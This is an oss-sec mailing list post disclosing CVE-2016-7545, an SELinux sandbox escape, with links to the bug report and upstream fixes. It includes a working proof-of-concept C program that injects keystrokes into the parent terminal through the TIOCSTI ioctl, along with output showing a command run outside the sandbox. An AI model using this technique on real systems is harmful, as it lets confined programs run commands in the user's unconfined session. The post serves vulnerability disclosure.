oss-sec mailing list archives
CVE-2016-7545 -- SELinux sandbox escape
From: up201407890 () alunos dcc fc up pt
Date: Sun, 25 Sep 2016 13:49:11 +0200
Hi, When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. $ cat test.c #include <unistd.h> #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o test $ /bin/sandbox ./test id uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176 $ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Bug report: https://bugzilla.redhat.com/show_bug.cgi?id=1378577 Upstream fix: https://marc.info/?l=selinux&m=147465160112766&w=2 https://marc.info/?l=selinux&m=147466045909969&w=2 https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379 Federico Bento. ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.
Current thread:
- CVE-2016-7545 -- SELinux sandbox escape up201407890 (Sep 25)
- Re: CVE-2016-7545 -- SELinux sandbox escape Jakub Wilk (Sep 26)
- Re: CVE-2016-7545 -- SELinux sandbox escape John Haxby (Sep 26)
- Re: CVE-2016-7545 -- SELinux sandbox escape up201407890 (Sep 26)
- Re: CVE-2016-7545 -- SELinux sandbox escape Christos Zoulas (Sep 26)
- Re: CVE-2016-7545 -- SELinux sandbox escape Jakub Wilk (Sep 29)
- Re: CVE-2016-7545 -- SELinux sandbox escape Christos Zoulas (Sep 29)
- Re: CVE-2016-7545 -- SELinux sandbox escape Jakub Wilk (Sep 26)